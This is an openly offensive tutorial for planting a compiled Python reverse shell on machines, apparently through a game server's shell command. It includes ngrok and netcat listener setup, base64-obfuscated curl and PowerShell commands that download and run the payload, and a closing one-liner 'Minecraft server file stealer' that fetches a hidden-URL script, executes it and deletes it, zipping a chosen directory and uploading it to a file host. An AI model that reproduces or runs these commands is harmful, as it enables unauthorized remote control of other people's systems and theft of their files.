
Python Reverse Shell Tutorial (Linux and Windows)

I made a Windows batch script that does it all automatically, from installing Python, to compiling the code and uploading, it's all user-friendly

On Your Own Computer

you will need Python, Netcat, & Ngrok

  1. Get Netcat

    • For Windows: Download Netcat
    • For Linux or macOS: Find and install the appropriate files for your OS.
  2. Get Ngrok and Set Up

  3. Start Ngrok
    ngrok tcp 4444

  4. Start Netcat
    nc -lvp 4444

  5. Download and Edit Python File

    • Download the Python script n compiler and in rs.py edit the IP and port to be the Ngrok one.
    • (Must have python installed) run windows compile.bat and only if you have wsl setup you can run linux compile.bat and the files that show up are compilex executables.
    • Upload the compiled files to anontransfer.com!
    • Once finished uploading goto the download url, click download, then go into your downlaod manager and copy the direct download link.
  6. Convert URL to Base64

In Game (run under the shell command)

  1. Copy and Paste the Command into your Terminal
    • While in, use the command below, replacing {BASE64 GOES HERE} with the Base64 link: Linux: curl -O $(echo "{BASE64 GOES HERE}" | base64 --decode)

Windows: powershell -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('{BASE64 GOES HERE}'))) -OutFile ([System.IO.Path]::GetFileName(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('{BASE64 GOES HERE}')))))"

  1. Run the File Linux: chmod +x {FILENAME} ./{FILENAME} Windows: start {FILENAME}


Linux mc server file stealer

bash -c 'curl -o steal.sh $(echo "aHR0cHM6Ly9jYXRsaXR0ZXIubWlub2EuY2F0L2FwaS92aWV3L2FkMGI1MTJhNzZiNTBjODhlY2VmLnNo" | base64 --decode) && chmod +x steal.sh && bash ./steal.sh && rm -- steal.sh'

(downloads and runs this script that zips and uploads whatever dir you enter to gofile and gives you the link only on linux)